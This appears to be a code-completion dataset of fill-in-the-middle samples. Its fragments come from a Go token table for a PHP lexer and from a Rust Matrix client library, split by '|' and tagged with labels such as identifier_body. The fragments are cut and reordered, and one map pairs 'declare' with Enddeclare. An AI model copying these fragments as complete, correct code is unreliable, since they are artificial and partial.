Endswitch: "Endswitch",
Case: "Case",
Default: "Default",
Break: "Break",
Continue: "Continue",
Goto: "Goto",
Function: "Function",
Const: "Const",
Return: "Return",
Try: "Try",
Catch: "Catch",
Finally: "Finally",
Throw: "Throw",
Use: "Use",
Insteadof: "Insteadof",
Global: "Global",
Var: "Var",
Unset: "Unset",
Isset: "Isset",
Empty: "Empty",
HaltCompiler: "HaltCompiler",
Class: "Class",
Trait: "Trait",
Interface: "Interface",
Extends: "Extends",
Implements: "Implements",
ObjectOperator: "ObjectOperator",
List: "List",
Array: "Array",
Callable: "Callable",
Line: "__LINE__",
File: "__FILE__",
Dir: "__DIR__",
ClassC: "__CLASS__",
TraitC: "__TRAIT__",
MethodC: "__METHOD__",
FuncC: "__FUNCTION__",
Comment: "Comment",
DocComment: "DocComment",
OpenTag: "OpenTag",
OpenTagWithEcho: "OpenTagWithEcho",
CloseTag: "CloseTag",
Whitespace: "Whitespace",
StartHeredoc: "StartHeredoc",
EndHeredoc: "EndHeredoc",
DollarOpenCurlyBraces: "DollarOpenCurlyBraces",
CurlyOpen: "CurlyOpen",
PaamayimNekudotayim: "PaamayimNekudotayim",
Namespace: "Namespace",
NsC: "__NAMESPACE__",
NsSeparator: "NsSeparator",
Ellipsis: "Ellipsis",
Error: "Error",
// Single character
Semicolon: "Semicolon",
Colon: "Colon",
Comma: "Comma",
Dot: "Dot",
LBracket: "LBracket",
RBracket: "RBracket",
LParen: "LParen",
RParen: "RParen",
Bar: "Bar",
Caret: "Caret",
Ampersand: "Ampersand",
Plus: "Plus",
Minus: "Minus",
Asterisk: "Asterisk",
Slash: "Slash",
Assign: "Assign",
Modulo: "Modulo",
Bang: "Bang",
Tilde: "Tilde",
Dollar: "Dollar",
Lt: "Lt",
Gt: "Gt",
QuestionMark: "QuestionMark",
At: "At",
DoubleQuotes: "DoubleQuotes",
LBrace: "LBrace",
RBrace: "RBrace",
Backquote: "Backquote",
}
func (t Type) String() string |
var keywords = map[string]Type{
"abstract": Abstract,
"and": BooleanAnd,
"array": Array,
"as": As,
"break": Break,
"callable": Callable,
"case": Case,
"catch": Catch,
"class": Class,
"clone": Clone,
"const": Const,
"continue": Continue,
"declare": Declare,
"default": Default,
"die": Exit,
"do": Do,
"echo": Echo,
"else": Else,
"elseif": Elseif,
"empty": Empty,
"enddeclare": Enddeclare,
"endfor": Endfor,
"endforeach": Endforeach,
"endif": Endif,
"endswitch": Endswitch,
"endwhile": Endwhile,
"eval": Eval,
"exit": Exit,
"extends": Extends,
"final": Final,
"finally": Finally,
"for": For,
"foreach": Foreach,
"function": Function,
"global": Global,
"goto": Goto,
"if": If,
"implements": Implements,
| {
if n, ok := tokenName[t]; ok {
return n
}
return "Unknown"
} | identifier_body |
token.go | ConstantEncapsedString
StringVarname
NumString
Exit
If
Echo
Do
While
Endwhile
For
Endfor
Foreach
Endforeach
Declare
Enddeclare
As
Switch
Endswitch
Case
Default
Break
Continue
Goto
Function
Const
Return
Try
Catch
Finally
Throw
Use
Insteadof
Global
Var
Unset
Isset
Empty
HaltCompiler
Class
Trait
Interface
Extends
Implements
ObjectOperator
List
Array
Callable
Line
File
Dir
ClassC
TraitC
MethodC
FuncC
Comment
DocComment
OpenTag
OpenTagWithEcho
CloseTag
Whitespace
StartHeredoc
EndHeredoc
DollarOpenCurlyBraces
CurlyOpen
PaamayimNekudotayim
Namespace
NsC
NsSeparator
Ellipsis
Error
// Single character
Semicolon // ';'
Colon // ':'
Comma // ','
Dot // '.'
LBracket // '['
RBracket // ']'
LParen // '('
RParen // ')'
Bar // '|'
Caret // '^'
Ampersand // '&'
Plus // '+'
Minus // '-'
Asterisk // '*'
Slash // '/'
Assign // '='
Modulo // '%'
Bang // '!'
Tilde // '~'
Dollar // '$'
Lt // '<'
Gt // '>'
QuestionMark // '?'
At // '@'
DoubleQuotes // '"'
LBrace // '{'
RBrace // '}'
Backquote // '`'
)
type Token struct {
Line int
Type Type
Literal string
}
var tokenName = map[Type]string{
End: "End",
Include: "Include",
IncludeOnce: "IncludeOnce",
Eval: "Eval",
Require: "Require",
RequireOnce: "RequireOnce",
LogicalOr: "LogicalOr",
LogicalXor: "LogicalXor",
LogicalAnd: "LogicalAnd",
Print: "Print",
Yield: "Yield",
DoubleArrow: "DoubleArrow",
YieldFrom: "YieldFrom",
PlusEqual: "PlusEqual",
MinusEqual: "MinusEqual",
MulEqual: "MulEqual",
DivEqual: "DivEqual",
ConcatEqual: "ConcatEqual",
ModEqual: "ModEqual",
AndEqual: "AndEqual",
OrEqual: "OrEqual",
XorEqual: "XorEqual",
SlEqual: "SlEqual",
SrEqual: "SrEqual",
PowEqual: "PowEqual",
Coalesce: "Coalesce",
BooleanOr: "BooleanOr",
BooleanAnd: "BooleanAnd",
IsEqual: "IsEqual",
IsNotEqual: "IsNotEqual",
IsIdentical: "IsIdentical",
IsNotIdentical: "IsNotIdentical",
Spaceship: "Spaceship",
IsSmallerOrEqual: "IsSmallerOrEqual",
IsGreaterOrEqual: "IsGreaterOrEqual",
Sl: "Sl",
Sr: "Sr",
Instanceof: "Instanceof",
Inc: "Inc",
Dec: "Dec",
IntCast: "IntCast",
DoubleCast: "DoubleCast",
StringCast: "StringCast",
ArrayCast: "ArrayCast",
ObjectCast: "ObjectCast",
BoolCast: "BoolCast",
UnsetCast: "UnsetCast",
Pow: "Pow",
New: "New",
Clone: "Clone",
Noelse: "Noelse",
Elseif: "Elseif",
Else: "Else",
Endif: "Endif",
Static: "Static",
Abstract: "Abstract",
Final: "Final",
Private: "Private",
Protected: "Protected",
Public: "Public",
Lnumber: "Lnumber",
Dnumber: "Dnumber",
String: "String",
Variable: "Variable",
InlineHtml: "InlineHtml",
EncapsedAndWhitespace: "EncapsedAndWhitespace",
ConstantEncapsedString: "ConstantEncapsedString",
StringVarname: "StringVarname",
NumString: "NumString",
Exit: "Exit",
If: "If",
Echo: "Echo",
Do: "Do",
While: "While",
Endwhile: "Endwhile",
For: "For",
Endfor: "Endfor",
Foreach: "Foreach",
Endforeach: "Endforeach",
Declare: "Declare",
Enddeclare: "Enddeclare",
As: "As",
Switch: "Switch",
Endswitch: "Endswitch",
Case: "Case",
Default: "Default",
Break: "Break",
Continue: "Continue",
Goto: "Goto",
Function: "Function",
Const: "Const",
Return: "Return",
Try: "Try",
Catch: "Catch",
Finally: "Finally",
Throw: "Throw",
Use: "Use",
Insteadof: "Insteadof",
Global: "Global",
Var: "Var",
Unset: "Unset",
Isset: "Isset",
Empty: "Empty",
HaltCompiler: "HaltCompiler",
Class: "Class",
Trait: "Trait",
Interface: "Interface",
Extends: "Extends",
Implements: "Implements",
ObjectOperator: "ObjectOperator",
List: "List",
Array: "Array",
Callable: "Callable",
Line: "__LINE__",
File: "__FILE__",
Dir: "__DIR__",
ClassC: "__CLASS__",
TraitC: "__TRAIT__",
MethodC: "__METHOD__",
FuncC: "__FUNCTION__",
Comment: "Comment",
DocComment: "DocComment",
OpenTag: "OpenTag",
OpenTagWithEcho: "OpenTagWithEcho",
CloseTag: "CloseTag",
Whitespace: "Whitespace",
StartHeredoc: "StartHeredoc",
EndHeredoc: "EndHeredoc",
DollarOpenCurlyBraces: "DollarOpenCurlyBraces",
CurlyOpen: "CurlyOpen",
PaamayimNekudotayim: "PaamayimNekudotayim",
Namespace: "Namespace",
NsC: "__NAMESPACE__",
NsSeparator: "NsSeparator",
Ellipsis: "Ellipsis",
Error: "Error",
// Single character
Semicolon: "Semicolon",
Colon: "Colon",
Comma: "Comma",
Dot: "Dot",
LBracket: "LBracket",
RBracket: "RBracket",
LParen: "LParen",
RParen: "RParen",
Bar: "Bar",
Caret: "Caret",
Ampersand: "Ampersand",
Plus: "Plus",
Minus: "Minus",
Asterisk: "Asterisk",
Slash: "Slash",
Assign: "Assign",
Modulo: "Modulo",
Bang: "Bang",
Tilde: "Tilde",
Dollar: "Dollar",
Lt: "Lt",
Gt: "Gt",
QuestionMark: "QuestionMark",
At: "At",
DoubleQuotes: "DoubleQuotes",
LBrace: "LBrace",
RBrace: "RBrace",
Backquote: "Backquote",
}
func (t Type) String() string {
if n, ok := tokenName[t]; ok {
return n
}
return "Unknown"
}
var keywords = map[string]Type{
"abstract": Abstract,
"and": BooleanAnd,
"array": Array,
"as": As,
"break": Break,
"callable": Callable,
"case": Case,
"catch": Catch,
"class": Class,
"clone": Clone,
"const": Const,
"continue": Continue,
"declare": Declare,
"default": Default,
"die": Exit,
"do": Do,
"echo": Echo,
"else": Else,
"elseif": Elseif,
"empty": Empty,
"enddeclare": Enddeclare,
"endfor": Endfor,
"endforeach": Endforeach,
"endif": Endif,
"endswitch": | EncapsedAndWhitespace | random_line_split | |
token.go | "Clone",
Noelse: "Noelse",
Elseif: "Elseif",
Else: "Else",
Endif: "Endif",
Static: "Static",
Abstract: "Abstract",
Final: "Final",
Private: "Private",
Protected: "Protected",
Public: "Public",
Lnumber: "Lnumber",
Dnumber: "Dnumber",
String: "String",
Variable: "Variable",
InlineHtml: "InlineHtml",
EncapsedAndWhitespace: "EncapsedAndWhitespace",
ConstantEncapsedString: "ConstantEncapsedString",
StringVarname: "StringVarname",
NumString: "NumString",
Exit: "Exit",
If: "If",
Echo: "Echo",
Do: "Do",
While: "While",
Endwhile: "Endwhile",
For: "For",
Endfor: "Endfor",
Foreach: "Foreach",
Endforeach: "Endforeach",
Declare: "Declare",
Enddeclare: "Enddeclare",
As: "As",
Switch: "Switch",
Endswitch: "Endswitch",
Case: "Case",
Default: "Default",
Break: "Break",
Continue: "Continue",
Goto: "Goto",
Function: "Function",
Const: "Const",
Return: "Return",
Try: "Try",
Catch: "Catch",
Finally: "Finally",
Throw: "Throw",
Use: "Use",
Insteadof: "Insteadof",
Global: "Global",
Var: "Var",
Unset: "Unset",
Isset: "Isset",
Empty: "Empty",
HaltCompiler: "HaltCompiler",
Class: "Class",
Trait: "Trait",
Interface: "Interface",
Extends: "Extends",
Implements: "Implements",
ObjectOperator: "ObjectOperator",
List: "List",
Array: "Array",
Callable: "Callable",
Line: "__LINE__",
File: "__FILE__",
Dir: "__DIR__",
ClassC: "__CLASS__",
TraitC: "__TRAIT__",
MethodC: "__METHOD__",
FuncC: "__FUNCTION__",
Comment: "Comment",
DocComment: "DocComment",
OpenTag: "OpenTag",
OpenTagWithEcho: "OpenTagWithEcho",
CloseTag: "CloseTag",
Whitespace: "Whitespace",
StartHeredoc: "StartHeredoc",
EndHeredoc: "EndHeredoc",
DollarOpenCurlyBraces: "DollarOpenCurlyBraces",
CurlyOpen: "CurlyOpen",
PaamayimNekudotayim: "PaamayimNekudotayim",
Namespace: "Namespace",
NsC: "__NAMESPACE__",
NsSeparator: "NsSeparator",
Ellipsis: "Ellipsis",
Error: "Error",
// Single character
Semicolon: "Semicolon",
Colon: "Colon",
Comma: "Comma",
Dot: "Dot",
LBracket: "LBracket",
RBracket: "RBracket",
LParen: "LParen",
RParen: "RParen",
Bar: "Bar",
Caret: "Caret",
Ampersand: "Ampersand",
Plus: "Plus",
Minus: "Minus",
Asterisk: "Asterisk",
Slash: "Slash",
Assign: "Assign",
Modulo: "Modulo",
Bang: "Bang",
Tilde: "Tilde",
Dollar: "Dollar",
Lt: "Lt",
Gt: "Gt",
QuestionMark: "QuestionMark",
At: "At",
DoubleQuotes: "DoubleQuotes",
LBrace: "LBrace",
RBrace: "RBrace",
Backquote: "Backquote",
}
func (t Type) String() string {
if n, ok := tokenName[t]; ok {
return n
}
return "Unknown"
}
var keywords = map[string]Type{
"abstract": Abstract,
"and": BooleanAnd,
"array": Array,
"as": As,
"break": Break,
"callable": Callable,
"case": Case,
"catch": Catch,
"class": Class,
"clone": Clone,
"const": Const,
"continue": Continue,
"declare": Declare,
"default": Default,
"die": Exit,
"do": Do,
"echo": Echo,
"else": Else,
"elseif": Elseif,
"empty": Empty,
"enddeclare": Enddeclare,
"endfor": Endfor,
"endforeach": Endforeach,
"endif": Endif,
"endswitch": Endswitch,
"endwhile": Endwhile,
"eval": Eval,
"exit": Exit,
"extends": Extends,
"final": Final,
"finally": Finally,
"for": For,
"foreach": Foreach,
"function": Function,
"global": Global,
"goto": Goto,
"if": If,
"implements": Implements,
"include": Include,
"include_once": IncludeOnce,
"instanceof": Instanceof,
"insteadof": Insteadof,
"interface": Interface,
"isset": Isset,
"list": List,
"namespace": Namespace,
"new": New,
"or": BooleanOr,
"print": Print,
"private": Private,
"protected": Protected,
"public": Public,
"require": Require,
"require_once": RequireOnce,
"return": Return,
"static": Static,
"switch": Switch,
"throw": Throw,
"trait": Trait,
"try": Try,
"unset": Unset,
"use": Use,
"var": Var,
"while": While,
}
var identifiers = map[string]Type{
"exit": Exit,
"die": Exit,
"function": Function,
"const": Const,
"return": Return,
"yield": Yield,
"try": Try,
"catch": Catch,
"finally": Finally,
"throw": Throw,
"if": If,
"elseif": Elseif,
"endif": Endif,
"else": Else,
"while": While,
"endwhile": Endwhile,
"do": Do,
"for": For,
"endfor": Endfor,
"foreach": Foreach,
"endforeach": Endforeach,
"declare": Enddeclare,
"instanceof": Instanceof,
"as": As,
"switch": Switch,
"endswitch": Endswitch,
"case": Case,
"default": Default,
"break": Break,
"continue": Continue,
"goto": Goto,
"echo": Echo,
"print": Print,
"class": Class,
"interface": Interface,
"trait": Trait,
"extends": Extends,
"implements": Implements,
"new": New,
"clone": Clone,
"var": Var,
"eval": Eval,
"include": Include,
"include_once": IncludeOnce,
"require": Require,
"require_once": RequireOnce,
"namespace": Namespace,
"use": Use,
"insteadof": Insteadof,
"global": Global,
"isset": Isset,
"empty": Empty,
"__halt_compiler": HaltCompiler,
"static": Static,
"abstract": Abstract,
"final": Final,
"private": Private,
"protected": Protected,
"public": Public,
"unset": Unset,
"list": List,
"array": Array,
"callable": Callable,
"__class__": ClassC,
"__trait__": TraitC,
"__function__": FuncC,
"__method__": MethodC,
"__line__": Line,
"__file__": File,
"__dir__": Dir,
"__namespace__": NsC,
"or": LogicalOr,
"and": LogicalAnd,
"xor": LogicalXor,
}
func LookupIdent(ident string) Type {
if t, ok := identifiers[strings.ToLower(ident)]; ok | {
return t
} | conditional_block | |
token.go | of
Global
Var
Unset
Isset
Empty
HaltCompiler
Class
Trait
Interface
Extends
Implements
ObjectOperator
List
Array
Callable
Line
File
Dir
ClassC
TraitC
MethodC
FuncC
Comment
DocComment
OpenTag
OpenTagWithEcho
CloseTag
Whitespace
StartHeredoc
EndHeredoc
DollarOpenCurlyBraces
CurlyOpen
PaamayimNekudotayim
Namespace
NsC
NsSeparator
Ellipsis
Error
// Single character
Semicolon // ';'
Colon // ':'
Comma // ','
Dot // '.'
LBracket // '['
RBracket // ']'
LParen // '('
RParen // ')'
Bar // '|'
Caret // '^'
Ampersand // '&'
Plus // '+'
Minus // '-'
Asterisk // '*'
Slash // '/'
Assign // '='
Modulo // '%'
Bang // '!'
Tilde // '~'
Dollar // '$'
Lt // '<'
Gt // '>'
QuestionMark // '?'
At // '@'
DoubleQuotes // '"'
LBrace // '{'
RBrace // '}'
Backquote // '`'
)
type Token struct {
Line int
Type Type
Literal string
}
var tokenName = map[Type]string{
End: "End",
Include: "Include",
IncludeOnce: "IncludeOnce",
Eval: "Eval",
Require: "Require",
RequireOnce: "RequireOnce",
LogicalOr: "LogicalOr",
LogicalXor: "LogicalXor",
LogicalAnd: "LogicalAnd",
Print: "Print",
Yield: "Yield",
DoubleArrow: "DoubleArrow",
YieldFrom: "YieldFrom",
PlusEqual: "PlusEqual",
MinusEqual: "MinusEqual",
MulEqual: "MulEqual",
DivEqual: "DivEqual",
ConcatEqual: "ConcatEqual",
ModEqual: "ModEqual",
AndEqual: "AndEqual",
OrEqual: "OrEqual",
XorEqual: "XorEqual",
SlEqual: "SlEqual",
SrEqual: "SrEqual",
PowEqual: "PowEqual",
Coalesce: "Coalesce",
BooleanOr: "BooleanOr",
BooleanAnd: "BooleanAnd",
IsEqual: "IsEqual",
IsNotEqual: "IsNotEqual",
IsIdentical: "IsIdentical",
IsNotIdentical: "IsNotIdentical",
Spaceship: "Spaceship",
IsSmallerOrEqual: "IsSmallerOrEqual",
IsGreaterOrEqual: "IsGreaterOrEqual",
Sl: "Sl",
Sr: "Sr",
Instanceof: "Instanceof",
Inc: "Inc",
Dec: "Dec",
IntCast: "IntCast",
DoubleCast: "DoubleCast",
StringCast: "StringCast",
ArrayCast: "ArrayCast",
ObjectCast: "ObjectCast",
BoolCast: "BoolCast",
UnsetCast: "UnsetCast",
Pow: "Pow",
New: "New",
Clone: "Clone",
Noelse: "Noelse",
Elseif: "Elseif",
Else: "Else",
Endif: "Endif",
Static: "Static",
Abstract: "Abstract",
Final: "Final",
Private: "Private",
Protected: "Protected",
Public: "Public",
Lnumber: "Lnumber",
Dnumber: "Dnumber",
String: "String",
Variable: "Variable",
InlineHtml: "InlineHtml",
EncapsedAndWhitespace: "EncapsedAndWhitespace",
ConstantEncapsedString: "ConstantEncapsedString",
StringVarname: "StringVarname",
NumString: "NumString",
Exit: "Exit",
If: "If",
Echo: "Echo",
Do: "Do",
While: "While",
Endwhile: "Endwhile",
For: "For",
Endfor: "Endfor",
Foreach: "Foreach",
Endforeach: "Endforeach",
Declare: "Declare",
Enddeclare: "Enddeclare",
As: "As",
Switch: "Switch",
Endswitch: "Endswitch",
Case: "Case",
Default: "Default",
Break: "Break",
Continue: "Continue",
Goto: "Goto",
Function: "Function",
Const: "Const",
Return: "Return",
Try: "Try",
Catch: "Catch",
Finally: "Finally",
Throw: "Throw",
Use: "Use",
Insteadof: "Insteadof",
Global: "Global",
Var: "Var",
Unset: "Unset",
Isset: "Isset",
Empty: "Empty",
HaltCompiler: "HaltCompiler",
Class: "Class",
Trait: "Trait",
Interface: "Interface",
Extends: "Extends",
Implements: "Implements",
ObjectOperator: "ObjectOperator",
List: "List",
Array: "Array",
Callable: "Callable",
Line: "__LINE__",
File: "__FILE__",
Dir: "__DIR__",
ClassC: "__CLASS__",
TraitC: "__TRAIT__",
MethodC: "__METHOD__",
FuncC: "__FUNCTION__",
Comment: "Comment",
DocComment: "DocComment",
OpenTag: "OpenTag",
OpenTagWithEcho: "OpenTagWithEcho",
CloseTag: "CloseTag",
Whitespace: "Whitespace",
StartHeredoc: "StartHeredoc",
EndHeredoc: "EndHeredoc",
DollarOpenCurlyBraces: "DollarOpenCurlyBraces",
CurlyOpen: "CurlyOpen",
PaamayimNekudotayim: "PaamayimNekudotayim",
Namespace: "Namespace",
NsC: "__NAMESPACE__",
NsSeparator: "NsSeparator",
Ellipsis: "Ellipsis",
Error: "Error",
// Single character
Semicolon: "Semicolon",
Colon: "Colon",
Comma: "Comma",
Dot: "Dot",
LBracket: "LBracket",
RBracket: "RBracket",
LParen: "LParen",
RParen: "RParen",
Bar: "Bar",
Caret: "Caret",
Ampersand: "Ampersand",
Plus: "Plus",
Minus: "Minus",
Asterisk: "Asterisk",
Slash: "Slash",
Assign: "Assign",
Modulo: "Modulo",
Bang: "Bang",
Tilde: "Tilde",
Dollar: "Dollar",
Lt: "Lt",
Gt: "Gt",
QuestionMark: "QuestionMark",
At: "At",
DoubleQuotes: "DoubleQuotes",
LBrace: "LBrace",
RBrace: "RBrace",
Backquote: "Backquote",
}
func (t Type) | () string {
if n, ok := tokenName[t]; ok {
return n
}
return "Unknown"
}
var keywords = map[string]Type{
"abstract": Abstract,
"and": BooleanAnd,
"array": Array,
"as": As,
"break": Break,
"callable": Callable,
"case": Case,
"catch": Catch,
"class": Class,
"clone": Clone,
"const": Const,
"continue": Continue,
"declare": Declare,
"default": Default,
"die": Exit,
"do": Do,
"echo": Echo,
"else": Else,
"elseif": Elseif,
"empty": Empty,
"enddeclare": Enddeclare,
"endfor": Endfor,
"endforeach": Endforeach,
"endif": Endif,
"endswitch": Endswitch,
"endwhile": Endwhile,
"eval": Eval,
"exit": Exit,
"extends": Extends,
"final": Final,
"finally": Finally,
"for": For,
"foreach": Foreach,
"function": Function,
"global": Global,
"goto": Goto,
"if": If,
"implements": Implements,
| String | identifier_name |
lib.rs | of synchronizing with the homeserver (i.e. getting all the latest
//! events), use the `Client::sync`:
//!
//! ```no_run
//! # use futures::{Future, Stream};
//! # use ruma_client::Client;
//! # let homeserver_url = "https://example.com".parse().unwrap();
//! # let client = Client::https(homeserver_url, None).unwrap();
//! let work = client.sync(None, None, true).map(|response| {
//! // Do something with the data in the response...
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
//!
//! The `Client` type also provides methods for registering a new account if you don't already have
//! one with the given homeserver.
//!
//! Beyond these basic convenience methods, `ruma-client` gives you access to the entire Matrix
//! client-server API via the `api` module. Each leaf module under this tree of modules contains
//! the necessary types for one API endpoint. Simply call the module's `call` method, passing it
//! the logged in `Client` and the relevant `Request` type. `call` will return a future that will
//! resolve to the relevant `Response` type.
//!
//! For example:
//!
//! ```no_run
//! # use futures::Future;
//! # use ruma_client::Client;
//! # let homeserver_url = "https://example.com".parse().unwrap();
//! # let client = Client::https(homeserver_url, None).unwrap();
//! use std::convert::TryFrom;
//!
//! use ruma_client::api::r0::alias::get_alias;
//! use ruma_identifiers::{RoomAliasId, RoomId};
//!
//! let request = get_alias::Request {
//! room_alias: RoomAliasId::try_from("#example_room:example.com").unwrap(),
//! };
//!
//! let work = get_alias::call(client, request).and_then(|response| {
//! assert_eq!(response.room_id, RoomId::try_from("!n8f893n9:example.com").unwrap());
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
#![deny(
missing_copy_implementations,
missing_debug_implementations,
missing_docs,
warnings
)]
#![warn(
clippy::empty_line_after_outer_attr,
clippy::expl_impl_clone_on_copy,
clippy::if_not_else,
clippy::items_after_statements,
clippy::match_same_arms,
clippy::mem_forget,
clippy::missing_docs_in_private_items,
clippy::mut_mut,
clippy::needless_borrow,
clippy::needless_continue,
clippy::single_match_else,
clippy::unicode_not_nfc,
clippy::use_self,
clippy::used_underscore_binding,
clippy::wrong_pub_self_convention,
clippy::wrong_self_convention
)]
use std::{
convert::TryInto,
str::FromStr,
sync::{Arc, Mutex},
};
use futures::{
future::{Future, FutureFrom, IntoFuture},
stream::{self, Stream},
};
use hyper::{
client::{connect::Connect, HttpConnector},
Client as HyperClient, Uri,
};
#[cfg(feature = "hyper-tls")]
use hyper_tls::HttpsConnector;
#[cfg(feature = "hyper-tls")]
use native_tls::Error as NativeTlsError;
use ruma_api::Endpoint;
use url::Url;
use crate::error::InnerError;
pub use crate::{error::Error, session::Session};
/// Matrix client-server API endpoints.
pub mod api;
mod error;
mod session;
/// A client for the Matrix client-server API.
#[derive(Debug)]
pub struct Client<C: Connect>(Arc<ClientData<C>>);
/// Data contained in Client's Rc
#[derive(Debug)]
struct ClientData<C>
where
C: Connect,
{
/// The URL of the homeserver to connect to.
homeserver_url: Url,
/// The underlying HTTP client.
hyper: HyperClient<C>,
/// User session data.
session: Mutex<Option<Session>>,
}
impl Client<HttpConnector> {
/// Creates a new client for making HTTP requests to the given homeserver.
pub fn new(homeserver_url: Url, session: Option<Session>) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: HyperClient::builder().keep_alive(true).build_http(),
session: Mutex::new(session),
}))
}
/// Get a copy of the current `Session`, if any.
///
/// Useful for serializing and persisting the session to be restored later.
pub fn session(&self) -> Option<Session> |
}
#[cfg(feature = "tls")]
impl Client<HttpsConnector<HttpConnector>> {
/// Creates a new client for making HTTPS requests to the given homeserver.
pub fn https(homeserver_url: Url, session: Option<Session>) -> Result<Self, NativeTlsError> {
let connector = HttpsConnector::new(4)?;
Ok(Self(Arc::new(ClientData {
homeserver_url,
hyper: { HyperClient::builder().keep_alive(true).build(connector) },
session: Mutex::new(session),
})))
}
}
impl<C> Client<C>
where
C: Connect + 'static,
{
/// Creates a new client using the given `hyper::Client`.
///
/// This allows the user to configure the details of HTTP as desired.
pub fn custom(
hyper_client: HyperClient<C>,
homeserver_url: Url,
session: Option<Session>,
) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: hyper_client,
session: Mutex::new(session),
}))
}
/// Log in with a username and password.
///
/// In contrast to api::r0::session::login::call(), this method stores the
/// session data returned by the endpoint in this client, instead of
/// returning it.
pub fn log_in(
&self,
user: String,
password: String,
device_id: Option<String>,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::session::login;
let data = self.0.clone();
login::call(
self.clone(),
login::Request {
address: None,
login_type: login::LoginType::Password,
medium: None,
device_id,
password,
user,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a guest. In contrast to api::r0::account::register::call(),
/// this method stores the session data returned by the endpoint in this
/// client, instead of returning it.
pub fn register_guest(&self) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::Guest),
password: None,
username: None,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Register as a new user on this server.
///
/// In contrast to api::r0::account::register::call(), this method stores
/// the session data returned by the endpoint in this client, instead of
/// returning it.
///
/// The username is the local part of the returned user_id. If it is
/// omitted from this request, the server will generate one.
pub fn register_user(
&self,
username: Option<String>,
password: String,
) -> impl Future<Item = Session, Error = Error> {
use crate::api::r0::account::register;
let data = self.0.clone();
register::call(
self.clone(),
register::Request {
auth: None,
bind_email: None,
device_id: None,
initial_device_display_name: None,
kind: Some(register::RegistrationKind::User),
password: Some(password),
username,
},
)
.map(move |response| {
let session = Session {
access_token: response.access_token,
device_id: response.device_id,
user_id: response.user_id,
};
*data.session.lock().unwrap() = Some(session.clone());
session
})
}
/// Convenience method that represents repeated calls to the sync_events endpoint as a stream.
///
/// If the since parameter is None, the first Item might take a significant time to arrive and
/// be deserialized, because it contains all | {
self.0
.session
.lock()
.expect("session mutex was poisoned")
.clone()
} | identifier_body |
lib.rs | let homeserver_url = "https://example.com".parse().unwrap();
//! # let client = Client::https(homeserver_url, None).unwrap();
//! let work = client.sync(None, None, true).map(|response| {
//! // Do something with the data in the response...
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
//!
//! The `Client` type also provides methods for registering a new account if you don't already have
//! one with the given homeserver.
//!
//! Beyond these basic convenience methods, `ruma-client` gives you access to the entire Matrix
//! client-server API via the `api` module. Each leaf module under this tree of modules contains
//! the necessary types for one API endpoint. Simply call the module's `call` method, passing it
//! the logged in `Client` and the relevant `Request` type. `call` will return a future that will
//! resolve to the relevant `Response` type.
//!
//! For example:
//!
//! ```no_run
//! # use futures::Future;
//! # use ruma_client::Client;
//! # let homeserver_url = "https://example.com".parse().unwrap();
//! # let client = Client::https(homeserver_url, None).unwrap();
//! use std::convert::TryFrom;
//!
//! use ruma_client::api::r0::alias::get_alias;
//! use ruma_identifiers::{RoomAliasId, RoomId};
//!
//! let request = get_alias::Request {
//! room_alias: RoomAliasId::try_from("#example_room:example.com").unwrap(),
//! };
//!
//! let work = get_alias::call(client, request).and_then(|response| {
//! assert_eq!(response.room_id, RoomId::try_from("!n8f893n9:example.com").unwrap());
//! # Ok::<(), ruma_client::Error>(())
//! });
//!
//! // Start `work` on a futures runtime...
//! ```
#![deny(
missing_copy_implementations,
missing_debug_implementations,
missing_docs,
warnings
)]
#![warn(
clippy::empty_line_after_outer_attr,
clippy::expl_impl_clone_on_copy,
clippy::if_not_else,
clippy::items_after_statements,
clippy::match_same_arms,
clippy::mem_forget,
clippy::missing_docs_in_private_items,
clippy::mut_mut,
clippy::needless_borrow,
clippy::needless_continue,
clippy::single_match_else,
clippy::unicode_not_nfc,
clippy::use_self,
clippy::used_underscore_binding,
clippy::wrong_pub_self_convention,
clippy::wrong_self_convention
)]
use std::{
convert::TryInto,
str::FromStr,
sync::{Arc, Mutex},
};
use futures::{
future::{Future, FutureFrom, IntoFuture},
stream::{self, Stream},
};
use hyper::{
client::{connect::Connect, HttpConnector},
Client as HyperClient, Uri,
};
#[cfg(feature = "hyper-tls")]
use hyper_tls::HttpsConnector;
#[cfg(feature = "hyper-tls")]
use native_tls::Error as NativeTlsError;
use ruma_api::Endpoint;
use url::Url;
use crate::error::InnerError;
pub use crate::{error::Error, session::Session};
/// Matrix client-server API endpoints.
pub mod api;
mod error;
mod session;
/// A client for the Matrix client-server API.
#[derive(Debug)]
pub struct Client<C: Connect>(Arc<ClientData<C>>);
/// Data contained in Client's Rc
#[derive(Debug)]
struct ClientData<C>
where
C: Connect,
{
/// The URL of the homeserver to connect to.
homeserver_url: Url,
/// The underlying HTTP client.
hyper: HyperClient<C>,
/// User session data.
session: Mutex<Option<Session>>,
}
impl Client<HttpConnector> {
/// Creates a new client for making HTTP requests to the given homeserver.
pub fn new(homeserver_url: Url, session: Option<Session>) -> Self {
Self(Arc::new(ClientData {
homeserver_url,
hyper: HyperClient::builder().keep_alive(true).build_http(),
session: Mutex::new(session),
}))
}
/// Get a copy of the current `Session`, if any.
///
/// Useful for serializing and persisting the session to be restored later.
pub fn session(&self) -> Option<Session> {
self.0
.session
.lock()
.expect("session mutex was poisoned")
.clone()
}
}
#[cfg(feature = "tls")]
impl Client<HttpsConnector<HttpConnector>> {
/// Creates a new client for making HTTPS requests to the given homeserver.
pub fn https(homeserver_url: Url, session: Option<Session>) -> Result<Self, NativeTlsError> {
let connector = HttpsConnector::new(4)?;
Ok(Self(Arc::new(ClientData {
homeserver_url,
hyper: { HyperClient::builder().keep_alive(true).build(connector) },
session: Mutex::new(session),
})))
}
}
